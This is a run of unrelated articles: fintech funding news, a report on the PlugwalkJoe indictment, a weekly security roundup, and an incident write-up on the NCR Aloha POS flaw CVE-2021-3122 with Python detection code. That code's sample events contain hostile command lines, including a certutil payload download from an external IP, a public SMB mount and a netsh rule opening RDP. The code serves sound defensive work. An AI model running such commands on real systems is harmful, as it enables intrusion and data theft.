Nium crosses $1B valuation with $200M Riverwood Capital-led round

Business-to-business payments platform Nium announced Monday that it raised more than $200 million in Series D funding and saw its valuation rise above $1 billion.

The company, now Singapore-based but shifting to the Bay Area, touted the investment as making it “the first B2B payments unicorn from Southeast Asia.”

Riverwood Capital led the round, in which Temasek, Visa, Vertex Ventures, Atinum Capital, Beacon Venture Capital and Rocket Capital Investment participated, along with a group of angel investors like DoorDash’s Gokul Rajaram, FIS’ Vicky Bindra and Tribe Capital’s Arjun Sethi. Including the new funding, Nium has raised $300 million to date, Prajit Nanu, co-founder and CEO, told TechCrunch.

The B2B payments sector is already hot, yet underpenetrated, according to some experts. To give an idea just how hot, Nium was seeking $150 million for its Series D round, received commitments of $300 million from eager investors and settled on $200 million, Nanu said.

“This is our fourth or fifth fundraise, but we have never had this kind of interest before — we even had our term sheets in five days,” he added. “I believe this interest is because we’ve successfully managed to create a global platform that is heavily regulated, which gives us access to a lot of networks. This is an environment where payment is visible, and our core is powering frictionless commerce and enabling anyone to use our platform.”

Nium’s new round adds fuel to a fire shared by a number of companies all going after a global B2B payments market valued at $120 trillion annually: last week, Paystand raised $50 million in Series C funding to make B2B payments cashless, while Dwolla raised $21 million for its API that allows companies to build and facilitate fast payments. In March, Higo brought in $3.3 million to do the same in Latin America, while Balance, developing a B2B payments platform that allows merchants to offer a variety of payment methods, raised $5.5 million in February.

Nium’s approach is to provide access to a global payment infrastructure, including card issuance, accounts receivable and payable, and banking-as-a-service through a single API. The company’s network enables customers to then send funds to more than 100 countries, pay out in more than 60 currencies, accept funds in seven currencies and issue cards in more than 40 countries, Nanu said. The company also boasts money transfer, card issuances and banking licenses in 11 jurisdictions.

Francisco Alvarez-Demalde, co-founding partner and managing partner at Riverwood, said in an email that the combination of software — plus regulatory licenses — and operating a fintech infrastructure platform on behalf of neobanks and corporates is a global trend experiencing hyper-growth.

Riverwood followed Nium for many years, and its future vision was what got the firm interested in being a part of this round. Alvarez-Demalde said that “Nium has the incredible combination of a great market opportunity, a talented founder and team, and we believe the company is poised for global growth based on underlying secular technology trends like increasing real-time payment capabilities and the proliferation of cross border commerce.

“As a central payment infrastructure in one API, Nium is a catalyst that unlocks cross-border payments, local accounts and card issuance with a network of local market licenses, partners and banking relationships to facilitate moving money across the world,” he added. “Enterprises of all types are embedding financial services as part of their consumer experience, and Nium is a key global enabler of this trend.”

Nanu said the new funding enables the company to move to the United States, which represents 3% of Nium’s revenue. He wants to increase that to 20% over the next 18 months, as well as expand in Latin America. The investment also gives the company a 12- to 18-month runway for further M&A activity. In June, Nium acquired virtual card issuance company Ixaris, and in July acquired Wirecard Forex India to expose it to India’s market. He also plans to expand the company’s payments network infrastructure, invest in product development and add to Nium’s 700-person headcount.

Nium already counts hundreds of enterprise companies as clients and plans to onboard thousands more in the next year. The company processes $8 billion in payments annually and has issued more than 30 million virtual cards since 2015. Meanwhile, revenue grew by over 280% year over year.

All of this growth puts the company on a trajectory for an initial public offering, Nanu said. He has already spoken to people who will help the company formally kick off that journey in the first quarter of 2022.

“Unlike other companies that raise money for new products, we aim to expand in the existing sets of what we do,” Nanu said. “The U.S. is a new market, but we have a good brand and will use the new round to provide a better experience to the customer.”


Sedna banks $34M for a platform that parses large volumes of email and chat to automatically action items within them

Many have tried to do away with it, but email refuses to die… although in the process it might be (figuratively speaking) killing some of us with the workload it brings on to triage and use it. A startup called Sedna has built a system to help with that — specifically for enterprise and other business customers — by “reading” the text of emails, and chats, and automatically actioning items within them so that you don’t have to. And today, it’s announcing funding of $34 million to expand its work.

The funding, a Series B, is being led by Insight Partners, with Stride.VC, Chalfen Ventures and the SAP.iO fund (part of SAP) also participating. The funding will be used to continue building out more data science around Sedna’s core functionality, with the aim of moving into a wider set of verticals over time. Currently its main business is in the area of supply chain players, with Glencore, Norden, and Bunge among its customers. Other customers in areas like finance include the neobank Starling. London-based Sedna is not disclosing valuation.

Bill Dobie, Sedna’s CEO and founder originally from Vancouver but now in London, said the idea for the company was hatched out of his own experience.

“I spent years building software to help users be more productive, but no matter what we built we never really reduced people’s workload,” he said. The reason: the millstone that is called email, with its endless, unsolicited, inbound messages, some of which (just enough not to ignore) might be important. “What really struck me was how long it spent to move items out of and into email,” he said of the “to-do’s” that arose out of there.

Out of that, Sedna was built to “read” emails and give them more context and direction. Its system removes duplicates of action items and essentially increases the strike rate when it comes to people’s inboxes: what’s in there is more likely to be what you really need to see. And it does so at a very quick speed.

“Our main value is the sheer scale at which we operate,” Dobie said. “We read millions or even billions of messages in sub second response times.” Indeed, while many of us are not getting “millions” of emails, there is a world of messaging out there that needs reading beyond that. Think, for example, of the volume of data that will be coming down the pike from IoT-based diagnostics.

“Smart” inboxes have definitely become a thing for consumers — although arguably none work as well as you wish they did. What’s notable about Sedna has been how it’s tuned its particular algorithms to specific verticals, letting them get smarter around the kind of content and work practices in particular organizations.

Right now the work is driven by an API framework, with elements of “low code” formatting to let people shape their own Sedna experiences. The aim will be to make that even easier over time. It is an API-driven framework today, with some low code that the company is heading into, but mostly it is SAP or a shipping or trading system that understands the transaction under way; Sedna then uses a decision tree to categorize the messages.

Another area where Sedna might grow is in how it handles the information that it ingests. Currently, the company’s tech can be interconnected by a customer to then hand off certain work to RPA systems, as well as to specific humans. There is an obvious route to developing some of the second stage of software there — or alternatively, it’s a sign of how something like Sedna might get snapped up, or copied by one of the big RPA players.

“Bill started reimagining email where it was most broken and therefore hardest to fix—large teams managing huge volumes and complicated processes,” said Rebecca Liu-Doyle, principal at Insight Partners, in a statement. “Today, Sedna’s power is in its ability to introduce immense speed, simplicity, and delight to any inbox experience, regardless of scale or complexity. We are excited to partner with the Sedna team as they continue to make digital communication more intelligent for teams in global supply chain and beyond.” Liu-Doyle is joining the board with this round.

SAP is a strategic investor in this round, as Sedna potentially helps its customers be more productive while using SAP systems. “SAP continues to partner with SEDNA to deliver value to SAP customers. The ability to turn complex information into simpler intelligent collaboration has been a growing priority for many SAP customers,” said Stefan Sauer, global transport solutions lead at SAP, in a statement.

PlugwalkJoe Does the Perp Walk

Joseph “PlugwalkJoe” O’Connor, in a photo from a paid press release on Sept. 02, 2020, pitching him as a trustworthy cryptocurrency expert and advisor.

One day after last summer’s mass-hack of Twitter, KrebsOnSecurity wrote that 22-year-old British citizen Joseph “PlugwalkJoe” O’Connor appeared to have been involved in the incident. When the U.S. Justice Department last week announced O’Connor’s arrest and indictment, his alleged role in the Twitter compromise was well covered in the media.

But most of the coverage seems to have overlooked the far more sinister criminal charges in the indictment, which involve an underground scene wherein young men turn to extortion, sextortion, SIM swapping, death threats and physical attacks — all in a frenzied effort to seize control over social media accounts.

Skim the government’s indictment and you might overlook a footnote on Page 4 that says O’Connor is part of a group that had exactly zero reservations about using their playbook of harassment tactics against law enforcement agents who were already investigating their alleged crimes.

“O’Connor has potentially been linked to additional prior swatting incidents and possibly (although not confirmed and currently still under investigation) the swatting of a U.S. law enforcement officer,” the footnote reads.

Swatting involves making a false report to authorities in a target’s name with the intention of sending a heavily armed police force to that person’s address. It’s a potentially deadly hoax: Earlier this month, a Tennessee man was sentenced to 60 months in prison for setting in motion a swatting attack that led to the death of a 60-year-old grandfather.

As for the actual criminal charges, O’Connor faces ten counts, including conspiracy, computer intrusion, extortive communications, stalking and threatening communications.

FEMALE TARGETS

All of those come into play in the case of the Snapchat account of actor Bella Thorne, who was allegedly targeted by PlugwalkJoe and associates in June 2019.

Investigators say O’Connor was involved in a “SIM swap” against Thorne’s mobile phone number. Unauthorized SIM swapping is a scheme in which fraudsters trick or bribe employees at wireless phone companies into redirecting the target’s text messages and phone calls to a device they control. From there, the attackers can reset the password for any online account that allows password resets via SMS.

In this case, the SIM swap was done to wrest control over Thorne’s Snapchat account. Once inside, the attackers found nude photos of Thorne, which they then threatened to release unless she agreed to post on social media thanking the hackers using their online handles.

The intruders posted on Thorne’s Snapchat, “Will drop nudes if 5000 of you follow @PlugwalkJoe.” Thorne told the feds her phone lost service shortly before her account was hijacked. Investigators later found the same Internet address used to access Thorne’s Snapchat account also was used minutes later to access “@Joe” on Instagram, which O’Connor has claimed publicly.

On June 15, 2019, Thorne posted on Twitter that she’d been “threatened with my own nudes,” and posted screenshots of the text message with the individual who had extorted her. Thorne said she was releasing the photographs so that the individual would not be able to “take yet another thing from me.”

The indictment alleges O’Connor also swatted and cyberstalked a 16-year-old girl, sending her nude photos and threatening to rape and/or murder her and her family.

Social media personality Addison Rae had 55 million followers when her TikTok account got hacked last August. I noted on Twitter at the time that PlugWalkJoe had left his calling card yet again. The indictment alleges O’Connor also was involved in a SIM-swap against Rae’s mobile number.


BAD REACTION

Prosecutors believe that roughly a week after the Twitter hack O’Connor called in bomb threats and swatting attacks targeting a high school and an airport in California. They’re confident it was O’Connor making the swatting and bomb threat calls because his voice is on record in a call he made to federal investigators, as well as to an inmate arrested for SIM swapping.

Curiously left out of the media coverage of O’Connor’s alleged crimes is that PlugwalkJoe appears to have admitted in a phone call with the FBI to being part of a criminal conspiracy. In the days following the Twitter mass-hack, O’Connor was quoted in The New York Times denying any involvement in the Twitter bitcoin scam. “I don’t care,” O’Connor told The Times. “They can come arrest me. I would laugh at them. I haven’t done anything.”

Speaking with KrebsOnSecurity via Instagram instant message just days after the Twitter hack, O’Connor demanded that his name be kept out of future blog posts here. After he was told that couldn’t be promised, he mentioned that some people in his circle of friends had been known to hire others to deliver physical beatings on people they didn’t like. In nearly the same breath, O’Connor said he was open to talking to federal investigators and telling his side of the story.

According to the indictment, a week after the Twitter hack a man identifying himself as O’Connor called federal investigators in Northern California. Specifically, the call went to the REACT Task Force. REACT is a team of law enforcement officers and prosecutors based in Santa Clara, Calif. that is focused on catching criminal SIM swappers, and by this point REACT already had plenty of audio from phone calls traced back to O’Connor in which he allegedly participated in a SIM swapping or swatting attack.

“REACT began receiving tips in 2018 regarding illegal activity of an individual using the online moniker ‘PlugwalkJoe,’ purportedly identified as O’Connor from the United Kingdom,” the indictment states.

Prosecutors redacted the name of the law enforcement officer who allegedly was swatted by PlugwalkJoe, referring to him only as “C.T.,” a criminal investigator for the Santa Clara District Attorney and a REACT Task Force member.

FBI agents called O’Connor back at the number he left. O’Connor told the FBI that on the afternoon of July 15, 2020 he’d been in contact with other associates who were in communications with the alleged mastermind of the Twitter bitcoin scam. Those intermediaries worked directly with Graham Clark, then 17, who pleaded guilty to fraud charges last summer in connection with the Twitter hack and agreed to serve three years in prison followed by three years of probation.

The indictment says O’Connor told the feds he only wanted his friends to relay his desire for Clark to secure several different short Twitter usernames that belonged to other people, accounts that were to be later sold for a profit. The other associates who allegedly helped PlugwalkJoe interact with Clark also have since been charged in connection with the Twitter hack.

A copy of the indictment is here (PDF).

The Good, the Bad and the Ugly in Cybersecurity – Week 30

The Good

It was a year ago almost to the week that we reported on a mass cyber hack against at least 130 social media celebrities. As we reported at the time, Twitter accounts belonging to the likes of Joe Biden, Barack Obama, Elon Musk, Bill Gates, Apple and Uber were all breached and used to pull off a Bitcoin scam that netted the hackers over $100,000 in less than 24 hours. This week, it looks as though cybercops have caught up with yet another of the alleged perpetrators.

Police in Spain arrested a 22-year-old British man, Joseph O’Connor, on suspicion of being behind the attack. Three others, two from the U.S. and another from the U.K., have already been charged in the case. O’Connor faces computer intrusion charges relating to the Twitter hack as well as similar intrusions of TikTok and Snapchat. The Department of Justice says he is also being charged with cyberstalking a juvenile.

With the help of the U.K.’s National Crime Agency, the Spanish National Police arrested O’Connor on Wednesday after a request from U.S. authorities following a criminal complaint filed in the U.S. District Court for the Northern District of California. Once again, international law enforcement cooperation has proven vital in bringing those who perpetrate cyber crimes to justice.

The Bad

There was already plenty of controversy swirling around the Tokyo Olympics – from Russia’s stealth involvement to whether the event should even be taking place given the ongoing pandemic – but of course, cyber attackers had to get in on the act, too.

Initially, news broke early in the week apparently from a Japanese government source suggesting that login IDs and passwords for the Tokyo Olympic ticket portal had been posted to a Darknet “leaks” website following a breach. A spokesperson for the Tokyo 2020 Olympics International Communications Team later contradicted that claim, saying the government source was mistaken.

While it seems there had been some leaks, these were not related to a breach of the ticket portal. Rather, it appears some ticket holders as well as Olympic Village volunteers had been infected with malware and leaked their own credentials.

It seems these individuals were infected with infostealer malware that exfiltrated credentials stored in their browsers. The data was subsequently offered for sale on underground marketplaces.

While it’s certainly welcome to learn that a general breach of the Olympics ticket portal hasn’t taken place, there are concerns that threat actors are targeting the event. The FBI released an alert this week warning that cyber actors who wish to disrupt the event could use distributed denial of service (DDoS) attacks, ransomware, social engineering, phishing campaigns, or insider threats against entities associated with the Tokyo 2020 Summer Olympics. All involved are advised to remain vigilant and maintain best practices in their network and digital environments.

The Ugly

News has been breaking across mainstream media since Sunday regarding the use of iOS and Android spyware being sold to authoritarian regimes by private security contractor NSO. Apparently, the spyware platform known as “Pegasus” is meant to be used to target ‘persons of interest’ to governments and law enforcement agencies, but campaigners such as Amnesty International claim that the spyware is used by oppressive regimes to facilitate human rights violations around the world on a massive scale.

While opinion remains divided as to the true extent of the use of NSO’s spyware in the wild, there’s no doubt that there are genuine concerns that the spyware has been used to expose activists, journalists and politicians critical of certain governments.

Meanwhile, researchers claim that they have proof that the Pegasus spyware has successfully infected iPhone 11 and iPhone 12 models through iMessage zero-click attacks. Pegasus marketing material offers prospective clients unlimited access to targets’ mobile devices while “leaving no trace on the target devices”.

Source: Pegasus marketing material

NSO, for its part, disputes the claims made in the most recent revelations, arguing that the number of targets is substantially lower than the 50,000 claimed by campaigners, and that the company vets all its clients to ensure abuses do not occur.

Amidst all of this is another ongoing debate about Apple’s approach to security. The famously-secretive device manufacturer argues that iPhone security is enhanced by its opaque, proprietary operating system and Apple’s tight rein on application distribution. Many security researchers and privacy activists, on the other hand, say that such a ‘security by obscurity’ approach only serves to abet criminals by making it impossible for users to detect whether their devices have been compromised.

It’s a debate that’s not going to go away any time soon. Readers might like to reflect on whether they would be happy using desktop and laptop computers that, by design, were unable to run any third-party security software. If one feels nervous at the prospect of leaving computer security entirely in the hands of an OS vendor, it’s hard to imagine why we should be comfortable doing the same with our phones.


Paystand banks $50M to make B2B payments cashless and with no fees

It’s pretty easy for individuals to send money back and forth, and there are lots of cash apps from which to choose. On the commercial side, however, one business trying to send $100,000 the same way is not as easy.

Paystand wants to change that. The Scotts Valley, California-based company is using cloud technology and the Ethereum blockchain as the engine for its Paystand Bank Network that enables business-to-business payments with zero fees.

The company raised $50 million Series C funding led by NewView Capital, with participation from SoftBank’s SB Opportunity Fund and King River Capital. This brings the company’s total funding to $85 million, Paystand co-founder and CEO Jeremy Almond told TechCrunch.

During the 2008 economic downturn, Almond’s family lost their home. He decided to go back to graduate school and did his thesis on how commercial banking could be better and how digital transformation would be the answer. Gleaning his company vision from the enterprise side, Almond said what Venmo does for consumers, Paystand does for commercial transactions between mid-market and enterprise customers.

“Revenue is the lifeblood of a business, and money has become software, yet everything is in the cloud except for revenue,” he added.

He estimates that almost half of enterprise payments still involve a paper check, while fintech bets heavily on cards that come with 2% to 3% transaction fees, which Almond said is untenable when a business is routinely sending $100,000 invoices. Paystand is charging a flat monthly rate rather than a fee per transaction.

Paystand’s platform. Image Credits: Paystand

On the consumer side, companies like Square and Stripe were among the first wave of companies predominantly focused on accounts payable and then building business process software on top of an existing infrastructure.

Paystand’s view of the world is that the accounts receivable side is harder, which is why there aren’t many competitors. This is why Paystand is surfing the next wave of fintech, driven by blockchain and decentralized finance, to transform the $125 trillion B2B payment industry by offering an autonomous, cashless and feeless payment network that will be an alternative to cards, Almond said.

Customers using Paystand over a three-year period are able to yield average benefits like 50% savings on the cost of receivables and $850,000 savings on transaction fees. The company is seeing a 200% increase in monthly network payment value and customers grew two-fold in the past year.

The company said it will use the new funding to continue to grow the business by investing in open infrastructure. Specifically, Almond would like to reboot digital finance, starting with B2B payments, and reimagine the entire CFO stack.

“I’ve wanted something like this to exist for 20 years,” Almond said. “Sometimes it is the unsexy areas that can have the biggest impacts.”

As part of the investment, Jazmin Medina, principal at NewView Capital, will join Paystand’s board. She told TechCrunch that while the venture firm is a generalist, it is rooted in fintech and fintech infrastructure.

She also agrees with Almond that the B2B payments space is lagging in terms of innovation and has “strong conviction” in what Almond is doing to help mid-market companies proactively manage their cash needs.

“There is a wide blue ocean of the payment industry, and all of these companies have to be entirely digital to stay competitive,” Medina added. “There is a glaring hole if your revenue is holding you back because you are not digital. That is why the time is now.”


Payments company Paystone raises $23.8M to help service-based businesses engage with customers

Paystone, a payments and integrated software company, secured another strategic investment this year, this time $23.8 million ($30 million CAD) from Crédit Mutuel Equity, the private equity arm of Crédit Mutuel Alliance Fédérale.

The Canada-based company got its start in 2008 as the payment processing company Zomaron, and rebranded itself as Paystone in 2019. Today it provides electronic payments and customer engagement technology to businesses, particularly those that provide services, CEO Tarique Al-Ansari told TechCrunch.

“Paystone is on a mission to help businesses grow, and we were enthralled by their commitment to that mission and their focus on service-oriented verticals,” said Léa Perge, investor at Crédit Mutuel Equity in Canada, via email.

While most of the company’s peers focus on product companies, Al-Ansari saw how underserved the service side was: service businesses’ needs are different, and unlike retailers, they aren’t looking to sell online. Rather, they need an online presence and digital marketing to engage with customers, but their focus is being findable and having content that tells people why they should do business with them.

Paystone provides the marketing through content, help with reviews and with loyalty and rewards programs. However, rather than reward for spending, Paystone rewards for behavior. Refer a friend, get a reward. Write a review, get a reward. Al-Ansari calls it “payments as a benefit.” Referrals and reviews are how businesses become more findable, and the more content that’s out there, the more it helps people consider the business trustworthy, he added.

The new funding gives Canada-based Paystone total funds raised in 2021 of $78.8 million in a mix of debt and equity. It raised $54.9 million in January, funds that were barely touched as of yet, Al-Ansari said.

Though he wasn’t actively seeking new funds, Al-Ansari had been speaking with Crédit Mutuel Equity, which used to be CIC Capital Canada, prior to the pandemic, and their deal was put on hold.

Crédit Mutuel Equity came back with similar interest, and taking into account the kind of talent Paystone wanted to go after and its acquisition strategy — the company has already acquired five companies — Al-Ansari decided to take the additional funds. He said it gives the company options to hire more and double down on building the company, as well as enough capital to look for more acquisitions.

This year, Paystone entered the U.S. market for the first time and will do a proper launch later this year. The company has over 30,000 merchant locations on its platform throughout North America, and Al-Ansari expects that to grow by 5,000 this year. The company has 150 employees currently, and another 50 are expected to come on board by the end of the year.

In addition, Al-Ansari expects growth to accelerate for the rest of the year. The company processes around $6 billion in credit card payments and is on track to bring in $55.7 million in revenue this year. It is cash flow positive, a residual of the company’s origins of being bootstrapped, he said.

“We want to become the go-to destination for service businesses to set up a digital presence to accept payments and provide loyalty and rewards,” Al-Ansari said. “We will do this by solidifying our market position and growing our platform with the tools that customers want.”


CVE-2021-3122 | How We Caught a Threat Actor Exploiting NCR POS Zero Day

A guest post by Kyle Pagelow from Tetra Defense

In this post, we describe how our Incident Response team discovered and thwarted a threat actor stealing credit card data by exploiting a zero day RCE (remote code execution) vulnerability in NCR’s Aloha Point of Sale software, widely used in the catering and restaurant industries.

Our investigation led us to discover and report CVE-2021-3122. While Tetra Defense successfully defended the client’s business, removing the threat actor’s access from the client’s network and mitigating the entire infection chain, a large number of other potential victims are readily discoverable, many of whom could be actively exploited today.

According to the vendor, CVE-2021-3122 is a client misconfiguration, and it appears that it is up to each client using Aloha POS to ensure that the server is properly configured and cannot be exploited in the way described in this post.

While we acknowledge NCR’s position, it is also worth pointing out that this “misconfiguration” is widely deployed and known to be actively exploited. Therefore, we urge all NCR Aloha POS users to ensure their Aloha POS configuration follows NCR’s guidelines and to confirm that their POS network has not been compromised in the manner we discuss in detail below.

Point of Ingress | The Threat Actor’s Initial Compromise

NCR’s Aloha POS software is an end to end point of sale system application primarily used by restaurants to take orders, accept credit card payments and manage other sensitive business functions. As is standard practice, our client was running Aloha POS on an isolated private network, with a number of terminals utilizing this network. The only outward bound communication from any endpoint on the network was to the Aloha Back of House (BOH) server.

The Aloha BOH server provides administrative functions for each of the POS terminals and is responsible for all external communications. Primarily, external traffic consists of communication between the BOH server and NCR’s own servers for the purpose of receiving various administrative commands, performing maintenance and updating the POS terminals when required.

Prior to our IR investigation team being brought in, the client’s network appears to have first been compromised in February 2017. BlackPOS, rtPOS, GratefulPOS and PWNPOS were observed on the client’s systems, along with BTCamant ransomware, shortly after the client had engaged an MSP (managed service provider). While some of the malware infections avoided C2 communications and wrote files out locally to disk, by December 2018 RampagePOS was observed communicating with a C2 at support[.]nesinoder[.]com. This domain was later seen to be associated with Maze ransomware.

In September 2019, the threat actor began utilizing a commercial remote monitoring and management (RMM) tool called ScreenConnect. The threat actors configured the RMM tool to report to their own C2s and cleverly disguised the DNS to blend in with legitimate traffic to NCR by using the address support-ncr-aloha[.]net.

The threat actor’s next step was to begin installing credit card stealing malware on both the BOH server and terminal endpoints on January 9th, 2020. At this time, malware was pushed to the terminals using a batch script to update the hosts file on each terminal with an entry labelled ‘back’ and the IP address of the BOH server. Since the terminals had no ability to communicate externally, the malware was configured to send encrypted, scraped credit card data to the BOH server over port 1888.

Discovering the BOH RCE Attack Vector

While it’s not surprising that the terminals could have their hosts files manipulated by the BOH server, the attack’s real menace comes from the exploitation of a hitherto unknown vulnerability in the NCR Command Center Agent (cmcAgent.exe) running on the BOH server. While NCR has been at pains to point out that the exploit requires an unsupported configuration, our investigation found that there are hundreds of Aloha BOH servers currently configured in this way and, therefore, vulnerable to attack.

As attack methods, motives, and consequences change daily, our IR investigation team uses SentinelOne Singularity as our constant ongoing endpoint protection and alert method. We deployed SentinelOne on the client’s terminals and BOH servers as part of our emergency incident response effort. This allowed us not only to get full visibility into the threat actor’s TTPs but also alerts at each stage of the ongoing infection. Via the SentinelOne agents and management console, we were able to identify connections from external IP addresses to the Aloha Command Center Agent occurring over port 8089.


Having rebuilt the entire Aloha POS network, now with SentinelOne installed, we were able to observe how the actor then re-compromised the system. It quickly became apparent that the threat actor was able to connect to the cmcAgent.exe externally and run commands with SYSTEM level privileges.

The SentinelOne agent alerted us as the threat actor dropped an instance of the DoublePulsar backdoor on the BOH server and wrote malware to the ScreenConnect directory in c:\windows\temp. The threat actor used the Eternal Champion exploit from FUZZBUNCH to install the malware.

In addition, we observed the threat actor utilizing other LOLBins such as certutil to download files, the net command to mount shares to public IP addresses, and netsh to open ports on the Windows firewall and expose services such as RDP.
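As an added illustration of how this LOLBin activity can be surfaced from process-creation telemetry, the Python below (written for this article, not SentinelOne’s or NCR’s code) flags certutil downloads, `net use` mounts to public IP addresses and netsh inbound-allow rules; the event fields and command lines are constructed samples, not a vendor schema.

```python
import ipaddress
import re

# Constructed process-creation events (hypothetical EDR-style records; the
# field names are assumptions). 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges standing in for internet hosts.
SAMPLE_EVENTS = [
    {"host": "BOH01", "user": "NT AUTHORITY\\SYSTEM", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/d.exe c:\\windows\\temp\\d.exe"},
    {"host": "BOH01", "user": "NT AUTHORITY\\SYSTEM", "image": "net.exe",
     "cmdline": "net use z: \\\\198.51.100.7\\share /user:guest pass"},
    {"host": "BOH01", "user": "NT AUTHORITY\\SYSTEM", "image": "netsh.exe",
     "cmdline": "netsh advfirewall firewall add rule name=rdp dir=in action=allow protocol=TCP localport=3389"},
    {"host": "BOH01", "user": "BOH01\\aloha", "image": "net.exe",
     "cmdline": "net use p: \\\\10.0.5.2\\share"},          # intranet share: benign
    {"host": "BOH01", "user": "BOH01\\aloha", "image": "certutil.exe",
     "cmdline": "certutil.exe -verify cert.cer"},           # no download: benign
]

# Matches the host part of a UNC path when it is a dotted-quad IP address.
UNC_IP = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_external(ip: str) -> bool:
    """True when the address lies outside the private/loopback ranges a POS LAN uses."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def lolbin_findings(evt: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list if benign)."""
    image = evt["image"].lower()
    cmd = evt["cmdline"].lower()
    hits = []
    # certutil fetching from a URL: the download cradle seen on the BOH server.
    if image == "certutil.exe" and ("-urlcache" in cmd or "http://" in cmd or "https://" in cmd):
        hits.append("certutil_download")
    # net use mounting a share hosted on a public IP address.
    if image == "net.exe" and " use " in cmd:
        m = UNC_IP.search(evt["cmdline"])
        if m and is_external(m.group(1)):
            hits.append("net_use_public_ip")
    # netsh creating an inbound allow rule, e.g. to expose RDP.
    if image == "netsh.exe" and "add rule" in cmd and "dir=in" in cmd and "action=allow" in cmd:
        hits.append("netsh_inbound_allow")
    return hits


def scan(events: list[dict]) -> list[dict]:
    """Attach a 'findings' list to every event that trips at least one rule."""
    return [dict(evt, findings=f) for evt in events if (f := lolbin_findings(evt))]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["user"], alert["findings"], alert["cmdline"])
```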

We leveraged the management console’s Deep Visibility feature and found that the malware was using msiexec for the ScreenConnect MSI to reach out to the attacker’s C2 at support[.]ncr-aloha[.]net.

At this point, we leveraged the SentinelOne remote shell feature to kill off ScreenConnect and quarantine the cmcAgent.exe. We then ran further Deep Visibility queries to confirm that the threat actor had no remaining means of exploiting the network further.

Discovering CVE-2021-3122 and Creating a POC Exploit

Having secured the client’s network, our next task was to understand what vulnerability the threat actor was leveraging to access the Aloha BOH server. Our investigation found that a flaw exists within the NCR Command Center Agent (cmcAgent.exe). Systems that are configured with an internet-facing Command Center Agent display a banner with the hostname of the server and are discoverable through network scanning and banner grabbing. Simple searches can also be conducted through the use of tools such as shodan.io.

The cmcAgent’s RUNCommand function allows for a parameter to be supplied in a specially crafted XML request that can be executed remotely if the server is configured to listen on TCP port 8089 for incoming connections. Passing such a command allows the attacker to execute that command as SYSTEM.

In our POC, we executed a custom command remotely against a virtual machine that had the cmcAgent running. We created several requests and executed cmd.exe, powershell.exe and calc.exe. All processes spawned under the ‘SYSTEM’ user and were running in the background.

Additionally, when connecting to the port, the server will return a response with the hostname of the system as well as other information indicating the system is running Aloha software. This means it is a simple matter to conduct a shodan search for the banner and see which NCR customers have the Command Center Agent publicly exposed.
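As an added example of the detection logic a defender can apply to the exposure described in this section (code written for this article, not NCR’s or SentinelOne’s), the Python below flags inbound connections to the Command Center Agent port from outside the POS LAN and correlates them with shells spawned by cmcAgent.exe as SYSTEM; the telemetry records and addresses are constructed.

```python
import ipaddress
from collections import defaultdict

CMC_PORT = 8089            # Command Center Agent listener discussed above
SHELLS = {"cmd.exe", "powershell.exe"}
WINDOW_SECONDS = 60        # how closely a spawn must follow an external hit to correlate
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_external(ip: str) -> bool:
    """True when the address lies outside the private/loopback ranges a POS LAN uses."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


# Constructed sample telemetry (hypothetical EDR-style records; the field names
# are assumptions). 203.0.113.0/24 is a documentation range standing in for an
# internet source; timestamps are seconds.
SAMPLE_EVENTS = [
    {"ts": 1000, "host": "BOH01", "type": "net_conn", "dir": "in",
     "src_ip": "10.0.5.21", "dst_port": 8089, "image": "cmcAgent.exe"},
    {"ts": 2000, "host": "BOH01", "type": "net_conn", "dir": "in",
     "src_ip": "203.0.113.45", "dst_port": 8089, "image": "cmcAgent.exe"},
    {"ts": 2010, "host": "BOH01", "type": "proc_start", "parent": "cmcAgent.exe",
     "image": "cmd.exe", "user": "NT AUTHORITY\\SYSTEM", "cmdline": "cmd.exe /c whoami"},
    {"ts": 5000, "host": "BOH01", "type": "proc_start", "parent": "cmcAgent.exe",
     "image": "cmd.exe", "user": "NT AUTHORITY\\SYSTEM", "cmdline": "cmd.exe /c dir"},
]


def detect(events: list[dict]) -> list[tuple[str, int, str, str]]:
    """Return (severity, ts, host, reason) for every suspicious event, in time order."""
    alerts = []
    external_hits = defaultdict(list)   # host -> timestamps of external 8089 connections
    for evt in sorted(events, key=lambda e: e["ts"]):
        host = evt["host"]
        if (evt["type"] == "net_conn" and evt["dir"] == "in"
                and evt["dst_port"] == CMC_PORT and is_external(evt["src_ip"])):
            # The agent should only be reachable from internal hosts, never the internet.
            external_hits[host].append(evt["ts"])
            alerts.append(("high", evt["ts"], host,
                           f"external {evt['src_ip']} connected to cmcAgent on {CMC_PORT}"))
        elif (evt["type"] == "proc_start" and evt["parent"].lower() == "cmcagent.exe"
                and evt["image"].lower() in SHELLS):
            # A shell under cmcAgent right after an external connection matches the
            # RUNCommand abuse; on its own it still deserves review.
            correlated = any(evt["ts"] - t <= WINDOW_SECONDS for t in external_hits[host])
            severity = "critical" if correlated else "medium"
            reason = f"cmcAgent spawned {evt['image']} as {evt['user']}"
            if correlated:
                reason += f" within {WINDOW_SECONDS}s of an external {CMC_PORT} connection"
            alerts.append((severity, evt["ts"], host, reason))
    return alerts


if __name__ == "__main__":
    for severity, ts, host, reason in detect(SAMPLE_EVENTS):
        print(f"[{severity}] t={ts} {host}: {reason}")
```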

Responsible Disclosure and Vendor Response

In June 2020, Tetra contacted the vendor, NCR, creators of the Aloha platform, in order to responsibly disclose the vulnerability. NCR indicated that the vulnerability is only exploitable if customers are misconfigured and have the CMCAgent’s listening port exposed. NCR updated their documentation for the CMCAgent and added a requirement that the CMCAgent not be internet-facing. Tetra contacted CISA and disclosed the vulnerability in December 2020. MITRE rated the vulnerability with a CVSS score of 9.8.

Recommendations and Mitigation

NCR customers are urged to ensure they have updated to the latest available version.

Users running the Aloha POS system in their environment are strongly urged to review their system configuration and prohibit unauthorized hosts from connecting to vulnerable systems.

